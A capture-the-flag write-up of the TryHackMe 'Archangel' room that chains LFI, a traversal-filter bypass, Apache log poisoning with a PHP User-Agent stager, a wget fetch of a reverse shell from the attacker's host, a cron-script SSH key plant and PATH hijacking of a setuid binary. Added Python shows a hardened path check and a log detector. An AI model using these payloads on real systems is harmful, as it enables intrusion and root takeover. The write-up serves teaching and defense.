CTF Writeups

Tryhackme Archangel Writeup

WSGSec
Apr 10, 2022

Boot2root machine using LFI and privilege escalation on Linux

Get a shell

Find a different hostname

We start by gathering information about the server with nmap (all ports, with service and version detection):

$ nmap -A -p- $IP    
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 13:44 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.54.115
Host is up (0.049s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
| 256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_ 256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wavefire
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.99 seconds

We can see two open ports: 22 for SSH and 80 for HTTP. Without credentials, OpenSSH 7.6 is not a realistic way in, so we look at the web server first.

When we open the web page we can see a reference to an email address on a custom domain. That domain is our answer:

ans : mafialive.thm

Find flag 1

A gobuster scan against the IP address itself did not return anything useful. Since we now have a hostname, we add it to /etc/hosts mapped to the server's IP address (Apache serves a different virtual host depending on the Host header) and try again:

─$ curl http://mafialive.thm 
<h1>UNDER DEVELOPMENT</h1>
**************************

Find the page under development

The hostname brings us to a different page (UNDER DEVELOPMENT), so we run gobuster again, this time against the virtual host:

─$ gobuster dir -u http://mafialive.thm/  -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://mafialive.thm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/09/18 14:17:29 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/robots.txt (Status: 200) [Size: 34]
/server-status (Status: 403) [Size: 278]

===============================================================
2021/09/18 14:18:01 Finished
===============================================================

If we check the robots.txt file, we see a Disallow entry for /test.php:

─$ curl http://mafialive.thm/robots.txt
User-agent: *
Disallow: /test.php

ans: test.php

/test.php takes a `view` parameter and includes whatever file it names, which gives us a Local File Inclusion (LFI). Asking it to include itself would just execute the script, so we read its source through the php://filter wrapper, which base64-encodes the file before PHP gets to interpret it:

─$ curl -s http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

The response body is one long base64 string; save it as b64.txt.


Decode it with the base64 tool (or an online decoder) to recover the PHP source:

─$ base64 -d b64.txt > decoded.txt

┌──(kali㉿kali)-[~/CTF/THM/archangel]
└─$ cat decoded.txt

<!DOCTYPE HTML>
<html>
<head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>

</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
<?php
//FLAG: ****************
function containsStr($str, $substr) {
    return strpos($str, $substr) !== false;
}
if(isset($_GET["view"])){
    if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
        include $_GET['view'];
    }else{
        echo 'Sorry, Thats not allowed';
    }
}
?>
</div>
</body>
</html>
Ans: the flag is in the //FLAG comment near the top of the decoded PHP source.

Get a shell and find the user flag

Looking at the PHP above, the check is a substring blocklist, not a path check: a request is refused only if the view parameter literally contains `../..`, and it must also contain `/var/www/html/development_testing` somewhere in the string. Nothing canonicalises the path before the include, so `..//..` (or `.././..`) never matches the blocked substring, while the kernel still treats every `..` segment as a step up (repeated slashes and `.` segments are collapsed). That lets us read any file www-data can, such as /etc/passwd or the Apache access log:

─$ curl -s http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//var/log/apache2/access.log
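To make the bypass concrete, here is an added Python model of the check (example code written for this page, not code from the room or from the writeup's author). `original_check` mirrors the PHP logic, `resolve` uses `posixpath.normpath` as an offline stand-in for the kernel's path walk (or PHP's realpath(); symlinks are not modelled), and `hardened_check` shows the fix a code reviewer would ask for: canonicalise first, then test the result against the allowed directory. The payloads are the ones used above plus a few constructed variants.

```python
import posixpath

# Directory the PHP check expects to see in the string (from the decoded test.php).
WEBROOT = "/var/www/html/development_testing"


def original_check(view: str) -> bool:
    """Same logic as the check in test.php: refuse the literal substring '../..'
    and require WEBROOT to appear somewhere in the string. It never looks at
    the path the string actually resolves to."""
    return "../.." not in view and WEBROOT in view


def resolve(view: str) -> str:
    """Offline stand-in for the kernel's path walk (or PHP realpath()):
    collapse repeated slashes and '.' segments, step upward on '..'.
    Symlinks are not modelled."""
    return posixpath.normpath(view)


def hardened_check(view: str) -> bool:
    """Canonicalise first, then require the result to be a file under WEBROOT.
    A stream wrapper such as php://filter never canonicalises to a path under
    WEBROOT, so it is rejected without a separate scheme check; NUL bytes are
    refused outright because PHP's file functions stop at the first NUL."""
    if "\0" in view:
        return False
    return resolve(view).startswith(WEBROOT + "/")


def audit(view: str) -> dict:
    """Side by side: what the original filter allows, what the hardened one
    allows, and where the operating system would actually look."""
    return {
        "original_allows": original_check(view),
        "hardened_allows": hardened_check(view),
        "resolves_to": resolve(view),
    }


# Payloads from the writeup plus constructed variants.
PAYLOADS = [
    WEBROOT + "/mrrobot.php",                                      # legitimate
    WEBROOT + "/../../../../etc/passwd",                           # naive: blocked
    WEBROOT + "/..//..//..//..//..//var/log/apache2/access.log",  # double slash
    WEBROOT + "/.././.././../log/apache2/access.log",              # dot segments
    "php://filter/convert.base64-encode/resource=" + WEBROOT + "/test.php",
    WEBROOT + "/../development_testing/test.php",                  # harmless '..'
]

if __name__ == "__main__":
    for p in PAYLOADS:
        r = audit(p)
        print(f"{'ORIG-OK' if r['original_allows'] else 'ORIG-NO':7} "
              f"{'HARD-OK' if r['hardened_allows'] else 'HARD-NO':7} "
              f"{p}  ->  {r['resolves_to']}")
```

Run it and the two traversal payloads and the php://filter read all pass the original filter and all fail the hardened one, while the legitimate mrrobot.php include (and even a `..` that stays inside the directory) still works. In real PHP the hardened version would use realpath() against a fixed allowlist of filenames rather than a prefix test, but the principle is the same: decide on the canonical path, never on the raw string.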
Since we can include the Apache access log, we can turn the LFI into remote code execution with log poisoning: whatever we send in the User-Agent header is written verbatim into access.log, and when test.php includes that file PHP executes any `<?php ... ?>` tag it finds there. Two caveats before sending anything: Apache writes the log line after the request has been served, so the tag is executed by the next request that includes the log, not by the one that plants it (send the request twice, or follow it with any request carrying the `cmd` parameter); and the log only ever grows, so a payload with a PHP syntax error leaves a parse error in every later include and kills the vector. Burp Repeater is the easiest place to craft the request.
  • Serve a PHP reverse shell (configured with your IP and port) from the attacker box: python3 -m http.server 8000
  • In Repeater, set the User-Agent to a one-line PHP stager that runs the `cmd` query parameter, and pass a wget for the shell as `cmd`. The view parameter again uses a traversal the filter does not recognise (`.././..`).
  • wget writes into the current directory, and PHP sets that to the directory of the script being executed, so the file lands next to test.php in the vhost's document root, which is why it is reachable over HTTP afterwards.
GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget%20http://10.11.34.30:8000/123414.php HTTP/1.1
Host: mafialive.thm
User-Agent: <?php system($_GET['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
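Seen from the defender's side, every step of this chain leaves a recognisable trace in the very log we are poisoning. The following Python is an added example (written for this page, not code from the room or the writeup's author) that runs a few detection rules over constructed Apache combined-format lines modelled on the requests above; the attacker address 10.11.34.30 is reused from the writeup, the timestamps, sizes and shell filename are made up. It URL-decodes the request target before matching, because `<?php` arrives just as easily percent-encoded in the query string as in plain text in the User-Agent.

```python
import re
from urllib.parse import unquote

# Apache "combined" format; quoted fields may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
PHP_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
WRAPPERS = ("php://", "data:", "expect://", "phar://", "zip://")
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/proc/self/", "/var/log/",
             "access.log", "error.log")
# A '..' path segment; applied after repeated slashes are collapsed so that
# ..//.. and .././.. are caught as well as plain ../..
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")

# Constructed sample log, modelled on the requests in this writeup.
SAMPLE_LOG = [
    '10.11.34.30 - - [18/Sep/2021:14:20:01 -0400] "GET /robots.txt HTTP/1.1" 200 34 "-" "curl/7.74.0"',
    '10.11.34.30 - - [18/Sep/2021:14:25:13 -0400] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 1342 "-" "curl/7.74.0"',
    '10.11.34.30 - - [18/Sep/2021:14:31:40 -0400] "GET /test.php?view=/var/www/html/development_testing/..//..//..//..//..//var/log/apache2/access.log HTTP/1.1" 200 8812 "-" "curl/7.74.0"',
    '10.11.34.30 - - [18/Sep/2021:14:33:05 -0400] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget%20http://10.11.34.30:8000/shell.php HTTP/1.1" 200 9120 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.11.34.30 - - [18/Sep/2021:14:33:09 -0400] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=%3C%3Fphp%20phpinfo%28%29%3B%20%3F%3E HTTP/1.1" 200 9500 "-" "Mozilla/5.0"',
    '10.10.54.115 - - [18/Sep/2021:14:40:00 -0400] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line; None if it does not fit the format."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    entry = m.groupdict()
    parts = entry["request"].split(" ")
    # Decode the target so %3C%3Fphp or %2e%2e/ are seen for what they are.
    entry["target"] = unquote(parts[1]) if len(parts) >= 2 else unquote(entry["request"])
    return entry


def inspect(entry):
    """Return the names of every rule the entry trips, in a fixed order."""
    rules = []
    target = entry["target"]
    lowered = target.lower()
    # 1. A PHP open tag in any logged field means the log file itself is now
    #    executable if it is ever included. The User-Agent is the classic carrier.
    if any(PHP_TAG.search(f) for f in (target, entry["referer"], entry["ua"])):
        rules.append("php_tag")
    # 2. Stream wrappers in the request: source disclosure via php://filter etc.
    if any(w in lowered for w in WRAPPERS):
        rules.append("php_wrapper")
    # 3. Directory traversal, including the ..//.. and .././.. spellings.
    if TRAVERSAL.search(re.sub(r"/+", "/", target)):
        rules.append("traversal")
    # 4. Files the web application has no business including.
    if any(s in lowered for s in SENSITIVE):
        rules.append("sensitive_path")
    return rules


def scan(lines):
    """Run every rule over an iterable of log lines; lines that do not parse
    are reported too, since a poisoned log is often also a malformed one."""
    findings = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry is None:
            findings.append({"line": n, "ip": "?", "rules": ["unparseable"]})
            continue
        rules = inspect(entry)
        if rules:
            findings.append({"line": n, "ip": entry["ip"], "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']:>3}  {f['ip']:<15} {', '.join(f['rules'])}")
```

Lines 2 to 5 are flagged and the two ordinary requests are not. `php_tag` in the User-Agent is the high-fidelity signal: no legitimate client sends one, and its presence means the log must be treated as attacker-controlled code from that point on, which is also the reason Apache log files should never be readable by the PHP process in the first place.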

Start a netcat listener on the port the reverse shell is configured for, then request http://mafialive.thm/nameofyourshell.php to trigger it:

nc -lvnp 4321
listening on [any] 4321 ...
connect to [10.11.34.30] from (UNKNOWN) [10.10.115.78] 60838
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
21:19:47 up 51 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ cd /home
cd /home
www-data@ubuntu:/home$ ls
ls
archangel
www-data@ubuntu:/home$ cd archangel
cd archangel
www-data@ubuntu:/home/archangel$ ls
ls
myfiles secret user.txt
www-data@ubuntu:/home/archangel$ cat user.txt
cat user.txt
***{***************}

Ans: ***{***************}

Get User 2 flag

A cron job runs /opt/helloworld.sh as the archangel user (confirm with cat /etc/crontab). Both /opt and the script are world-writable (drwxrwxrwx and -rwxrwxrwx below), so anything we append to the script runs as archangel on the next scheduled run:
www-data@ubuntu:/opt$ ls -la
ls -la
total 16
drwxrwxrwx 3 root root 4096 Nov 20 10:35 .
drwxr-xr-x 22 root root 4096 Nov 16 15:39 ..
drwxrwx--- 2 archangel archangel 4096 Nov 20 15:04 backupfiles
-rwxrwxrwx 1 archangel archangel 66 Nov 20 10:35 helloworld.sh
www-data@ubuntu:/opt$ cat helloworld.sh
cat helloworld.sh
#!/bin/bash
echo "hello world" >> /opt/backupfiles

Generate a key pair on the attacker box (ssh-keygen) and have the cron job drop the public key into archangel's authorized_keys; once it has run we can ssh in as that user. Keep the permissions tight, otherwise sshd's StrictModes check may refuse to use the key:

#!/bin/bash
mkdir -p /home/archangel/.ssh
echo "your ssh public key here" > /home/archangel/.ssh/authorized_keys
chmod 700 /home/archangel/.ssh
chmod 600 /home/archangel/.ssh/authorized_keys

We can now ssh in as the user and grab the flag:

kali@kali:/data/Archangel/files$ ssh archangel@mafialive.thm
Warning: Permanently added the ECDSA host key for IP address '10.10.231.1' to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-123-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Fri Nov 20 15:21:35 2020
archangel@ubuntu:~$ ll
total 48
drwxr-xr-x 7 archangel archangel 4096 Apr 26 14:13 ./
drwxr-xr-x 3 root root 4096 Nov 18 13:06 ../
-rw-r--r-- 1 archangel archangel 220 Nov 18 00:48 .bash_logout
-rw-r--r-- 1 archangel archangel 3771 Nov 18 00:48 .bashrc
drwx------ 2 archangel archangel 4096 Nov 18 13:08 .cache/
drwxrwxr-x 3 archangel archangel 4096 Nov 18 11:20 .local/
drwxr-xr-x 2 archangel archangel 4096 Nov 18 01:36 myfiles/
-rw-r--r-- 1 archangel archangel 807 Nov 18 00:48 .profile
drwxrwx--- 2 archangel archangel 4096 Nov 19 20:41 secret/
-rw-rw-r-- 1 archangel archangel 66 Nov 18 11:20 .selected_editor
drwxrwxr-x 2 archangel archangel 4096 Apr 26 14:13 .ssh/
-rw-r--r-- 1 archangel archangel 26 Nov 19 19:57 user.txt
archangel@ubuntu:~$ cd secret/
archangel@ubuntu:~/secret$ ll
total 32
drwxrwx--- 2 archangel archangel 4096 Nov 19 20:41 ./
drwxr-xr-x 7 archangel archangel 4096 Apr 26 14:13 ../
-rwsr-xr-x 1 root root 16904 Nov 18 16:40 backup*
-rw-r--r-- 1 root root 49 Nov 19 20:41 user2.txt
archangel@ubuntu:~/secret$ cat user2.txt

Get the root flag

Looking around archangel's home directory, ~/secret contains a root-owned ELF binary, backup, with the setuid bit set (-rwsr-xr-x above), which is a good candidate for abuse. Running strings on it shows the command it executes: it calls cp to copy files into another directory:

cp /home/user/archangel/myfiles/* /opt/backupfiles

The binary invokes cp by its bare name, so the command is looked up through PATH, and a setuid binary that neither resets PATH nor uses absolute paths will run whatever we put first on it. We create our own cp in the secret directory that spawns an interactive shell and prepend that directory to PATH. (If the binary only carried the setuid bit and did not call setuid(0) itself, bash would drop the effective uid on startup; use /bin/bash -p in that case.)

archangel@ubuntu:~/secret$ cat > cp << EOF
> #!/bin/bash
> /bin/bash -i
> EOF
archangel@ubuntu:~/secret$ chmod +x cp
archangel@ubuntu:~/secret$ export PATH=/home/archangel/secret:$PATH

When we execute the script, it will use our own cp command, which will spawn a root shell:

archangel@ubuntu:~/secret$ ./backup 
root@ubuntu:~/secret# id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
root@ubuntu:~/secret# cd /root/
root@ubuntu:/root# ll
total 28
drwx------ 4 root root 4096 Nov 20 15:22 ./
drwxr-xr-x 22 root root 4096 Nov 16 15:39 ../
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Nov 18 13:06 .cache/
drwxr-xr-x 3 root root 4096 Nov 16 19:27 .local/
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 68 Nov 19 19:59 root.txt
root@ubuntu:/root# cat root.txt

The privilege escalation in this room may be tough for beginners, but you will learn a lot about chaining different vectors together to escalate to root. Would highly recommend checking this one out!
